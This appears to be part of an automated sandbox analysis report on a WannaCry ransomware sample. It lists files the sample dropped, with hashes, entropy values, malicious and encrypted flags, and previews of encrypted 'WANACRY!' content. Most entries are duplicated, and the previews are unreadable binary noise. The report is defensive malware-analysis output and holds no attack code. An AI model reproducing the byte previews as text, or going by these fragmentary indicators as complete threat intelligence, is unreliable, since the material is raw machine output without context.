                                                                                      SSDEEP:384:xe0UTpGmh2264OxXBJr9AUEopbJvETCN9JYCpyPIvn9MQi:xeVTAmhAxjr9AU/pVEWCCpr/3i
                                                                                      MD5:32036B1A42B2592DC389DA234F78D0F1
                                                                                      SHA1:EB4740B326F9B88CEC28300A80E237AFF1A9C05B
                                                                                      SHA-256:2F31FFAE961394F59EF02A250A95B652A30083D9BC1F6E43FE84F6B87597FE79
                                                                                      SHA-512:07C529A2F1959E9ACCD1418DF6023D2C2EF39D8EDC344AB73056F61F4619D95A64C305E55C76293FC232203C63289121EA7C42D3A1C2BE82370284F55C992630
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....r...g..B.y0I..S.o...5........vy.{YO.+..l7pW..1...y....J....J|5.Q...9.pQ/J..s...N@...T.glF...q..2..'..k.~.nf..p.dc..?....r.Y.].]...4..C.yD.-....V: ..=ZBjw.Y.9..*K....1.......=.((.v....RD..lB....n...c.,.. .is.u....O.%.NmF.....r.zX......dy...7.s@`....Q:.........p.. ....kEC.q.l..T&.#.t.......q.a..k@.....>..X;ua..n..(..^.J..........I.....H\baZg...L.e..]....S..>.$.#....^U....s.CU..X.?.......R...V.....U..(.....^.c..e2..e.o....=.!.I3....&......v..;s...dsT@......r<.&W......(`x.P....(5....q.b...KG....Z.%.3...c.ieK*)..\v.......'.-...a.@~...R.1.*..V.R....`.p..g.],>M#...i....i...gC....7.].qv.=.B.*.2.&...J.a&....a..f@..rr..(.}..J!..ek.0pG?4.\....Dh...:FvG..@..^...-.u....c%>f..2..Q.k..(.X.C.4......?{~.k.`.)O.)/.1....S.Dli.F.IN..q...7O4)o...b....B..Ko2.]:.@.....J.29.o,Qj..j..Q{tc-U.;.5.....c..?...~...?.#|...K#......Nu.........J0A.........36..kzGA3.1...9..z....Dqj.D......l..:..y.WA 0...M...4..stU....[=n..@.. ......J....|R........R.4
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):59896
                                                                                      Entropy (8bit):7.996976306820257
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:8pMiAsKK0kSSMSDDlIKvKJ2HKKSM+8sGNSU4:qt0sMQ6KvY2HKKSM+8swSX
                                                                                      MD5:D5532E4F5A485938D270E35AA6CE31E4
                                                                                      SHA1:9FFC0585D37D35964A2C66A666C6E2BFE4EA9E69
                                                                                      SHA-256:E961CEB8C12AFB9137362E9973180681B8D64B82FFA605082F3B928D5FCB1A07
                                                                                      SHA-512:95E520C5C790A58B8DDD609C71D372E61865B232A1822575C593841230D24EE82003100F33F673390451D661EC8A5D73B06241D9191D55AEFD2056942A74BEE5
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...... K2q.q..-.+.N%.[.\....v!sObYW..Q..~.c...w....2....-.....&\A. _.4.qk.>..,....%..8.9Mo..g....4.....?S%.H8;.5.WjZ....&..Z]....#...v.ym.......z.".y.....A. ..`.`.B|a....Q.>h0x.b..J ..u.:.Q.#au...1\$...5=nK...P.o....f...I|..X.9i..)./...x#TS...K..............].C.y0.U.J^il-LA.D.....#j0d...xja!..w.E.Hf...>..2.......d{qe.&es]s.X,.......'.>/:s.....~B.\..EN,%O..M.c.E.`N+3.-.2U.Ti.....c.j]Y.b`Z.$G.S#.p.q9....m..H..J.#?..`.b.j.......S.qO~.%. .Bd.. ..H...9.....~.y....XGI`.RWh(....(..Z.f.].....j1.....N9...7....0.W.ZeE.....<N....N.=...q$..3.....-I.......QB.7..W.?...Ks..:..&...Of..(..7..1..;...I...?.<b-...bz.....|...x..)...j...+`....A...Z.k.*.S.G.Z......|.7...og...M.:w4Z...C..K...Z...i..Y.<.l.dN..G..N..+......I.....M.0$<.C....~ ..J.23....^..xkS._^u..Xxo.]..Q.6...9K1."Ur-.....M.kF.... +...5....|..1.U.s.L.:...a.f....}..F.*....H..m.Zf...G.QM.K.c...|....;.B{.0....6.`8.H...9 .%.sa.$....D.J.b@..5.....<6,..YW8{L..|.N.S..nT(.z</2.].E.B.'
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):59896
                                                                                      Entropy (8bit):7.996976306820257
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:8pMiAsKK0kSSMSDDlIKvKJ2HKKSM+8sGNSU4:qt0sMQ6KvY2HKKSM+8swSX
                                                                                      MD5:D5532E4F5A485938D270E35AA6CE31E4
                                                                                      SHA1:9FFC0585D37D35964A2C66A666C6E2BFE4EA9E69
                                                                                      SHA-256:E961CEB8C12AFB9137362E9973180681B8D64B82FFA605082F3B928D5FCB1A07
                                                                                      SHA-512:95E520C5C790A58B8DDD609C71D372E61865B232A1822575C593841230D24EE82003100F33F673390451D661EC8A5D73B06241D9191D55AEFD2056942A74BEE5
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...... K2q.q..-.+.N%.[.\....v!sObYW..Q..~.c...w....2....-.....&\A. _.4.qk.>..,....%..8.9Mo..g....4.....?S%.H8;.5.WjZ....&..Z]....#...v.ym.......z.".y.....A. ..`.`.B|a....Q.>h0x.b..J ..u.:.Q.#au...1\$...5=nK...P.o....f...I|..X.9i..)./...x#TS...K..............].C.y0.U.J^il-LA.D.....#j0d...xja!..w.E.Hf...>..2.......d{qe.&es]s.X,.......'.>/:s.....~B.\..EN,%O..M.c.E.`N+3.-.2U.Ti.....c.j]Y.b`Z.$G.S#.p.q9....m..H..J.#?..`.b.j.......S.qO~.%. .Bd.. ..H...9.....~.y....XGI`.RWh(....(..Z.f.].....j1.....N9...7....0.W.ZeE.....<N....N.=...q$..3.....-I.......QB.7..W.?...Ks..:..&...Of..(..7..1..;...I...?.<b-...bz.....|...x..)...j...+`....A...Z.k.*.S.G.Z......|.7...og...M.:w4Z...C..K...Z...i..Y.<.l.dN..G..N..+......I.....M.0$<.C....~ ..J.23....^..xkS._^u..Xxo.]..Q.6...9K1."Ur-.....M.kF.... +...5....|..1.U.s.L.:...a.f....}..F.*....H..m.Zf...G.QM.K.c...|....;.B{.0....6.`8.H...9 .%.sa.$....D.J.b@..5.....<6,..YW8{L..|.N.S..nT(.z</2.].E.B.'
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1240
                                                                                      Entropy (8bit):7.842197995207358
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkqkKiN9nyJRUOZeQwKZIyJwOVHCxZbUTz2Mnd7EzA20kQ17UAnO:bkfKifnyJRMQaXlUGgkZ0r/nO
                                                                                      MD5:D2F4BF77B20DF7E938E8CE9A95AED914
                                                                                      SHA1:D4E42A7EA3EA8160FB6F443C3304E1B6D7503E4E
                                                                                      SHA-256:2F960A61362DEEE8004CFA0FE7C901544CCCEB2A532D3E4AE9DF373A13289123
                                                                                      SHA-512:179E53E0170E11331FE600490426CB7CF2F62C6CAF319DF8F6B93E4B8E4C21422CFB5B4C0625D1613959DE98C39760F19AC1D10270F7E98D82130521DED880D6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....m..`.....$.AT..A.j.....u>.......im.8#... ;...G...m...yV.......S,.....N....b...`.2*..w....rA......8v.9...O.......<TG.W...I~..<.:....~&.od.P.).A....f..Fy..o. ...y..R..L....?c.o&39?.. ......@.... ?..:..]QS....'...y.W.+c.D.7...i.\Oc...>.f.c.............d...#..3.6..%..H~M.n..2.+..w..0f>...ngG2.........[9F.Sd.x......7.on.|f..|....-2'.&`..Ql3E..b.^.. `....{^.J..F.8>b...Y..@q........VK?.. .2...!....].i.L.....:.!w......mH..Y......P.5Mk....h.X.h4B...V..(...q)..g..3....-NDx..6...^&!cP.v.....(j..'9..mE.....w?......>tv.@...,tl........./|..4V...+[...q.y.'$T@.=.G.......6;BSh...d#O.Q.J.a..'....k...s...(.;..V.z...u..^p. M1....r6F~.~.......L.R.J.C......v..L.n..E.<5...;..0..N.V+'4.....AY....:{q...'`c.?.2..E...l...f.. ..]T@3R..4..x.LA..,s.Vk.C..?+.......e.o...v=..c.L.fs.d.Ua.e.D10%..0..].P.].1......@c.r.r.Zw.m...r.[3.f.....A.QC..u..l_.S-P.nIVe..U..~.J...n.L...%3b....\...x8...!.O.wQ?S.....)...C*$.r..V42z.'..E....K.....VB(....3.{{...\...#..6./3...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1240
                                                                                      Entropy (8bit):7.842197995207358
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkqkKiN9nyJRUOZeQwKZIyJwOVHCxZbUTz2Mnd7EzA20kQ17UAnO:bkfKifnyJRMQaXlUGgkZ0r/nO
                                                                                      MD5:D2F4BF77B20DF7E938E8CE9A95AED914
                                                                                      SHA1:D4E42A7EA3EA8160FB6F443C3304E1B6D7503E4E
                                                                                      SHA-256:2F960A61362DEEE8004CFA0FE7C901544CCCEB2A532D3E4AE9DF373A13289123
                                                                                      SHA-512:179E53E0170E11331FE600490426CB7CF2F62C6CAF319DF8F6B93E4B8E4C21422CFB5B4C0625D1613959DE98C39760F19AC1D10270F7E98D82130521DED880D6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....m..`.....$.AT..A.j.....u>.......im.8#... ;...G...m...yV.......S,.....N....b...`.2*..w....rA......8v.9...O.......<TG.W...I~..<.:....~&.od.P.).A....f..Fy..o. ...y..R..L....?c.o&39?.. ......@.... ?..:..]QS....'...y.W.+c.D.7...i.\Oc...>.f.c.............d...#..3.6..%..H~M.n..2.+..w..0f>...ngG2.........[9F.Sd.x......7.on.|f..|....-2'.&`..Ql3E..b.^.. `....{^.J..F.8>b...Y..@q........VK?.. .2...!....].i.L.....:.!w......mH..Y......P.5Mk....h.X.h4B...V..(...q)..g..3....-NDx..6...^&!cP.v.....(j..'9..mE.....w?......>tv.@...,tl........./|..4V...+[...q.y.'$T@.=.G.......6;BSh...d#O.Q.J.a..'....k...s...(.;..V.z...u..^p. M1....r6F~.~.......L.R.J.C......v..L.n..E.<5...;..0..N.V+'4.....AY....:{q...'`c.?.2..E...l...f.. ..]T@3R..4..x.LA..,s.Vk.C..?+.......e.o...v=..c.L.fs.d.Ua.e.D10%..0..].P.].1......@c.r.r.Zw.m...r.[3.f.....A.QC..u..l_.S-P.nIVe..U..~.J...n.L...%3b....\...x8...!.O.wQ?S.....)...C*$.r..V42z.'..E....K.....VB(....3.{{...\...#..6./3...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):45736
                                                                                      Entropy (8bit):7.995793215266605
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:IBhW8N1IAiKhDojieo2kqFcpW5qzZm3LT2qeTiMn/8lKHUm8sQHCOzFvGJEP2p+:QrwfqsiIkq6pW5qVM2dee/8lwZUHCOzz
                                                                                      MD5:0D3A1129092B06A9B183C973E84D853F
                                                                                      SHA1:037CAA216F677F3B80A437C425D245969A559E49
                                                                                      SHA-256:0D4859115AC84EEE624C710C218A9D8ED8B03D784C7C268494F7017D58F5E2FA
                                                                                      SHA-512:7E5AD3A63403C34AC32E60AC06174BF7C4C7D26DCDE61859E6BBD55681FFDD38128C082D2BCFFFF68360C9F899B3A6E9864DF3025A7C9ACF599E5808B51FFDF9
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....m.._}..Q..N.=.M..2\Lm....w....b..V3.......fn.....46.sSTQ..C..S(.>..9.S..QE..>&B.|......jO....:.+U?.Y.......*..:.{W..{.K.(o.B.([E....!+.$.B~:...k.*22..Ct.y..Bx.....y..cH.@I..8.:.?).~.Y.hw...\....V.%.p........MA..x....x.w3(ts1..;..o........a..............x....h.O..u.....9.(.R..z...K..6.Y....x.......9.".[..\.aQ.}........z...]...&.b.........h8^.....bE....$.ph.0..)F...}....a.X..I..{'.F.Z.......n.z...p....3...D[?....k:..f+..#.9k4.d.jq.O..?T.....q.7..6..o.H.1.i..*.._.Q.4Y1....mfs..az....a..N:.zA..B,\.".2.c....B.KV..QZ...gvHu.M3..(..+..Z.b.I.DW....[.#_c...T...1..`...X.......#.(<.....").gb..Y.8c...? .Y..T...8.^..H=....'...b..i..C.m....j. ........zXv...f...K*|A..+...}....G.{.A..G,...#%J..J(............].a1b...%Pz4..gP.3Iy43.hg.j...h)....d.T"5i.:&K`..}1C..[.x....W.[%.c....QU.SM.i.....j.z..*26x)..3.....-.&..k...E>U.P....+..ja..K."..........b.[.~Ug..b.e..J.A...uW>.........{.GI.S.:..l..7..N...J..1#.-5.lq.kQa.&D.s+B........W...-.....v@2.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):45736
                                                                                      Entropy (8bit):7.995793215266605
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:IBhW8N1IAiKhDojieo2kqFcpW5qzZm3LT2qeTiMn/8lKHUm8sQHCOzFvGJEP2p+:QrwfqsiIkq6pW5qVM2dee/8lwZUHCOzz
                                                                                      MD5:0D3A1129092B06A9B183C973E84D853F
                                                                                      SHA1:037CAA216F677F3B80A437C425D245969A559E49
                                                                                      SHA-256:0D4859115AC84EEE624C710C218A9D8ED8B03D784C7C268494F7017D58F5E2FA
                                                                                      SHA-512:7E5AD3A63403C34AC32E60AC06174BF7C4C7D26DCDE61859E6BBD55681FFDD38128C082D2BCFFFF68360C9F899B3A6E9864DF3025A7C9ACF599E5808B51FFDF9
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....m.._}..Q..N.=.M..2\Lm....w....b..V3.......fn.....46.sSTQ..C..S(.>..9.S..QE..>&B.|......jO....:.+U?.Y.......*..:.{W..{.K.(o.B.([E....!+.$.B~:...k.*22..Ct.y..Bx.....y..cH.@I..8.:.?).~.Y.hw...\....V.%.p........MA..x....x.w3(ts1..;..o........a..............x....h.O..u.....9.(.R..z...K..6.Y....x.......9.".[..\.aQ.}........z...]...&.b.........h8^.....bE....$.ph.0..)F...}....a.X..I..{'.F.Z.......n.z...p....3...D[?....k:..f+..#.9k4.d.jq.O..?T.....q.7..6..o.H.1.i..*.._.Q.4Y1....mfs..az....a..N:.zA..B,\.".2.c....B.KV..QZ...gvHu.M3..(..+..Z.b.I.DW....[.#_c...T...1..`...X.......#.(<.....").gb..Y.8c...? .Y..T...8.^..H=....'...b..i..C.m....j. ........zXv...f...K*|A..+...}....G.{.A..G,...#%J..J(............].a1b...%Pz4..gP.3Iy43.hg.j...h)....d.T"5i.:&K`..}1C..[.x....W.[%.c....QU.SM.i.....j.z..*26x)..3.....-.&..k...E>U.P....+..ja..K."..........b.[.~Ug..b.e..J.A...uW>.........{.GI.S.:..l..7..N...J..1#.-5.lq.kQa.&D.s+B........W...-.....v@2.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):22136
                                                                                      Entropy (8bit):7.992898951899422
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:EvsEknzWipDOjJW0UKvvMuN6eTe7umWNupKkl0HZ5CgKZNx42TKhzrV0GxcA8:cymzT3MuBmWAMBKG2iiG58
                                                                                      MD5:12A7844E03E058E490A37181E90FDAC4
                                                                                      SHA1:1D5B5E51DF9CADD6A6791B3C6172FE896A783003
                                                                                      SHA-256:54A0F553EAE61D324023D2577DBEED686D093290630D257380AEA5B329C29049
                                                                                      SHA-512:D4091FF8F7B9B404EC2D1FAEB8C64B3C77ED5F714974E32986B5767EDB127E185AE938FE83A93853EBCF86DB30A5E285C245D059BA823F6E9A27AB090CEE5A72
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......z.oM*......`i.MM.....@.Vqk.q....>J.u.3Ox..a....N....&...y..._D......Xt..+.7w`U...{...6.1.;:c......#...c.d>...4......C..........7h..P.q).Nt....+.t:....0@...".5...*...+P..|g..#W'=..._.....Z.$...wl.{..B.gCc?%..#..........f.dltMO....._..Z...u0V.......YU......2rV.s. ~.u.....<..5.........D23.. ..=-O..Wx.."....A:D.y.-K9..6.0..+.-l....F..1...P:.A}F.R...1N5...r.....[0...../-t...:.(..[~....0-.......(U#.4....n.>......:8N.h..[.}n..\n....As.....s.."....&.j.<.G..x[X..P.....Vd....#......(o)...............mS8.`n..,.-P.~..c.....a[s..PL2K...3.og..2.\.....&.\85.YQ.Ug.|.)...&.Ez$LB..G>..UT..F.Y..I}....M.. ....4...s..BFMCy ........k../.*..{.+.S...`..Y.....R.'..`......D...Pa.F...uQ.=..s.wV.~...Z).5...x....y..{.B.*.x.**......:.E.k.e. ........%....Z....s..q^.5.....i.......\...v#.2..l!....2..Y~....Qv.s.tIn,./-} `.....z.Z...eY...%..F.H$..2>k.(..<R\./..O.R.+..9......'.jk......;..l.............7)..o;.y.Ck....RC.Q...........e@.i.f.......T.4
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):22136
                                                                                      Entropy (8bit):7.992898951899422
                                                                                      Encrypted:true
                                                                                      SSDEEP:384:EvsEknzWipDOjJW0UKvvMuN6eTe7umWNupKkl0HZ5CgKZNx42TKhzrV0GxcA8:cymzT3MuBmWAMBKG2iiG58
                                                                                      MD5:12A7844E03E058E490A37181E90FDAC4
                                                                                      SHA1:1D5B5E51DF9CADD6A6791B3C6172FE896A783003
                                                                                      SHA-256:54A0F553EAE61D324023D2577DBEED686D093290630D257380AEA5B329C29049
                                                                                      SHA-512:D4091FF8F7B9B404EC2D1FAEB8C64B3C77ED5F714974E32986B5767EDB127E185AE938FE83A93853EBCF86DB30A5E285C245D059BA823F6E9A27AB090CEE5A72
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......z.oM*......`i.MM.....@.Vqk.q....>J.u.3Ox..a....N....&...y..._D......Xt..+.7w`U...{...6.1.;:c......#...c.d>...4......C..........7h..P.q).Nt....+.t:....0@...".5...*...+P..|g..#W'=..._.....Z.$...wl.{..B.gCc?%..#..........f.dltMO....._..Z...u0V.......YU......2rV.s. ~.u.....<..5.........D23.. ..=-O..Wx.."....A:D.y.-K9..6.0..+.-l....F..1...P:.A}F.R...1N5...r.....[0...../-t...:.(..[~....0-.......(U#.4....n.>......:8N.h..[.}n..\n....As.....s.."....&.j.<.G..x[X..P.....Vd....#......(o)...............mS8.`n..,.-P.~..c.....a[s..PL2K...3.og..2.\.....&.\85.YQ.Ug.|.)...&.Ez$LB..G>..UT..F.Y..I}....M.. ....4...s..BFMCy ........k../.*..{.+.S...`..Y.....R.'..`......D...Pa.F...uQ.=..s.wV.~...Z).5...x....y..{.B.*.x.**......:.E.k.e. ........%....Z....s..q^.5.....i.......\...v#.2..l!....2..Y~....Qv.s.tIn,./-} `.....z.Z...eY...%..F.H$..2>k.(..<R\./..O.R.+..9......'.jk......;..l.............7)..o;.y.Ck....RC.Q...........e@.i.f.......T.4
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):39320
                                                                                      Entropy (8bit):7.99512173513664
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:M2OHIPAYFYiyZokzdx3cpOO7EpQqSSASSELU+H4adsAijuy5duE6:/OobFbkTCOOYpQqSpr+Hj0jh5ds
                                                                                      MD5:BFBBCE3B66431563BC167C51A4F32C8B
                                                                                      SHA1:D21C08D8B1BFB51269813F5DB441987B232692B9
                                                                                      SHA-256:1F39C91A6CEA7B254A3AC90A99388441EBE9552CA4A24AC5CF84EE82070425BB
                                                                                      SHA-512:932E8EF0A559FD0058DD083F555AE78F83C25B6FC78D752C7A0831CC06883FCD6C9BE57183F53B5BDBD264659A17E9246E04CFEE5BD8368B49B9DC3B4D72281B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....U..X....?L..c.*..l.x .8..)....>y...A#(.7.8B.rn.!I...: D."~.fr.....M..6....T.X..Y..r.<.i....v.9....@G......`. .....z.PM.....!P.q].s...L...hKQ.<$.(.T..d..%..~7........r...x:.........U.....<.:n?.}.F.:@..r....Zw.)....-3....`.......w....l.........r.......)<M.5...AP.].e3.....?.....n~...^Ey]..X..{D...bT..b."......M..]G./..."..;...>]q^o...1tc.........IE..N....-M....U.......i..G>..H}z.PSj...vP.w/..A...r...3.......@..q.....<..X.R...k....DP/.{.C..7..LY#.c..X.]Z@K%E}.l.S..U.....{. 5...#.._.. ...Nx.|......%...vH...lz...K....}[...S....1.5F/.B(.u...Y.].G.wPa}.......nG...<*....5.z.E._...A.'.X..#.8.W*...l.h.kbg.3.$...2.d<.l..iR.%..B=8,...f.JSL.e...:.l....I.....)...".J..9.o.#Y.aW.!...{....[.x...]*e......o[A...B....rT.L.....3.....:...../.\...q.TL..o]O+......MS^.>.CH6..Y.'.C.6.4...=%.....mM.\7],......K......a...s.........GM....K.PMY.o.T.o.[.....E5.=...........C.3...`....8oH.t.).;X."..y.zt.3..b.#.|.g.U91....eLn..]mpB.=.%$.&.C0.A.&
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):39320
                                                                                      Entropy (8bit):7.99512173513664
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:M2OHIPAYFYiyZokzdx3cpOO7EpQqSSASSELU+H4adsAijuy5duE6:/OobFbkTCOOYpQqSpr+Hj0jh5ds
                                                                                      MD5:BFBBCE3B66431563BC167C51A4F32C8B
                                                                                      SHA1:D21C08D8B1BFB51269813F5DB441987B232692B9
                                                                                      SHA-256:1F39C91A6CEA7B254A3AC90A99388441EBE9552CA4A24AC5CF84EE82070425BB
                                                                                      SHA-512:932E8EF0A559FD0058DD083F555AE78F83C25B6FC78D752C7A0831CC06883FCD6C9BE57183F53B5BDBD264659A17E9246E04CFEE5BD8368B49B9DC3B4D72281B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....U..X....?L..c.*..l.x .8..)....>y...A#(.7.8B.rn.!I...: D."~.fr.....M..6....T.X..Y..r.<.i....v.9....@G......`. .....z.PM.....!P.q].s...L...hKQ.<$.(.T..d..%..~7........r...x:.........U.....<.:n?.}.F.:@..r....Zw.)....-3....`.......w....l.........r.......)<M.5...AP.].e3.....?.....n~...^Ey]..X..{D...bT..b."......M..]G./..."..;...>]q^o...1tc.........IE..N....-M....U.......i..G>..H}z.PSj...vP.w/..A...r...3.......@..q.....<..X.R...k....DP/.{.C..7..LY#.c..X.]Z@K%E}.l.S..U.....{. 5...#.._.. ...Nx.|......%...vH...lz...K....}[...S....1.5F/.B(.u...Y.].G.wPa}.......nG...<*....5.z.E._...A.'.X..#.8.W*...l.h.kbg.3.$...2.d<.l..iR.%..B=8,...f.JSL.e...:.l....I.....)...".J..9.o.#Y.aW.!...{....[.x...]*e......o[A...B....rT.L.....3.....:...../.\...q.TL..o]O+......MS^.>.CH6..Y.'.C.6.4...=%.....mM.\7],......K......a...s.........GM....K.PMY.o.T.o.[.....E5.=...........C.3...`....8oH.t.).;X."..y.zt.3..b.#.|.g.U91....eLn..]mpB.=.%$.&.C0.A.&
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):10712
                                                                                      Entropy (8bit):7.983189542781291
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:jsmv0wcmKQz7Z/G/WuJRt+ocJbw2LTd+EDzj++STnnLKfLsO65Hyc5nb:j9zKQ5ub+JHTdpDNeneTkHyc5b
                                                                                      MD5:B6343179C61C1192FDBFF4F8DC954315
                                                                                      SHA1:1D045E349E2B79B45C4C2E41F972C61C90CE0AAB
                                                                                      SHA-256:5F709FB40FEEA66A518D1D16F02550B2E05DB4BE42E82D42FBC1D27AD4C03F0B
                                                                                      SHA-512:CBCA0B75D3937D102C84149E25C73E67F977A6A3732B8A69F8330C768800C91E18812FCDA31341A1FB9672896402C06A881910AF990A2A8071AD13CADD59140E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....E..p.^.*..K.,......~.'.X2..r..h............4|$..)...pa.l...s.3YHQ..?"...2..).d.uR?H.E5.E.{d..N.B>..n...W._.4o...I.........4....e.M.Q.....M.Z.64...D&n_r;..m..m7,]+$..<.V.....T...(.mSM......~f,..._W4r...(u....G..z...y....E...\...?o$@...bi.v;..6......(......r.u.0...0....s..O..u.....F...h._.....l...x....Y~.^.<PY..t=R.H... _.:.....O..........p...X0.D..`.....T...><T.]..X..k....:0...C....x...9...KL........'v..D.zg'....TFZ..7$-...P....{ky/.J.KA..mJ.~N.Y..0...58.n.i(..aG.Gj.....Y ..3.f.jT.L..!.\..l.j.;.....*..F]..:.C........9.v.V.... .J5 ......^.`.#....n.N.:....K].B.+[..0.g..j.....;.7..q..6.[....5....|.B..Et.....3j.E..;..T..yHq%.G.k.......15.C..b?$..9[..J.........~....T3.#4K....lnb*........rE.3.~.M..F+.....Q.A.....VI .>.O....M%G..]...L..........T.mA.....1U..t..A..Q...(...).w....m...O.RE.Q....kk.8e...*5.r.W6.h.>.o5e.c.y.}....V.&s..g..7d).J.b..t.b...$}.B.vP....<......U....t._..;.'.S..........lxig60E...N..rE.1.....b.H...c7|....C.G.f....O.by-
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):10712
                                                                                      Entropy (8bit):7.983189542781291
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:jsmv0wcmKQz7Z/G/WuJRt+ocJbw2LTd+EDzj++STnnLKfLsO65Hyc5nb:j9zKQ5ub+JHTdpDNeneTkHyc5b
                                                                                      MD5:B6343179C61C1192FDBFF4F8DC954315
                                                                                      SHA1:1D045E349E2B79B45C4C2E41F972C61C90CE0AAB
                                                                                      SHA-256:5F709FB40FEEA66A518D1D16F02550B2E05DB4BE42E82D42FBC1D27AD4C03F0B
                                                                                      SHA-512:CBCA0B75D3937D102C84149E25C73E67F977A6A3732B8A69F8330C768800C91E18812FCDA31341A1FB9672896402C06A881910AF990A2A8071AD13CADD59140E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....E..p.^.*..K.,......~.'.X2..r..h............4|$..)...pa.l...s.3YHQ..?"...2..).d.uR?H.E5.E.{d..N.B>..n...W._.4o...I.........4....e.M.Q.....M.Z.64...D&n_r;..m..m7,]+$..<.V.....T...(.mSM......~f,..._W4r...(u....G..z...y....E...\...?o$@...bi.v;..6......(......r.u.0...0....s..O..u.....F...h._.....l...x....Y~.^.<PY..t=R.H... _.:.....O..........p...X0.D..`.....T...><T.]..X..k....:0...C....x...9...KL........'v..D.zg'....TFZ..7$-...P....{ky/.J.KA..mJ.~N.Y..0...58.n.i(..aG.Gj.....Y ..3.f.jT.L..!.\..l.j.;.....*..F]..:.C........9.v.V.... .J5 ......^.`.#....n.N.:....K].B.+[..0.g..j.....;.7..q..6.[....5....|.B..Et.....3j.E..;..T..yHq%.G.k.......15.C..b?$..9[..J.........~....T3.#4K....lnb*........rE.3.~.M..F+.....Q.A.....VI .>.O....M%G..]...L..........T.mA.....1U..t..A..Q...(...).w....m...O.RE.Q....kk.8e...*5.r.W6.h.>.o5e.c.y.}....V.&s..g..7d).J.b..t.b...$}.B.vP....<......U....t._..;.'.S..........lxig60E...N..rE.1.....b.H...c7|....C.G.f....O.by-
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3176
                                                                                      Entropy (8bit):7.941904673639651
                                                                                      Encrypted:false
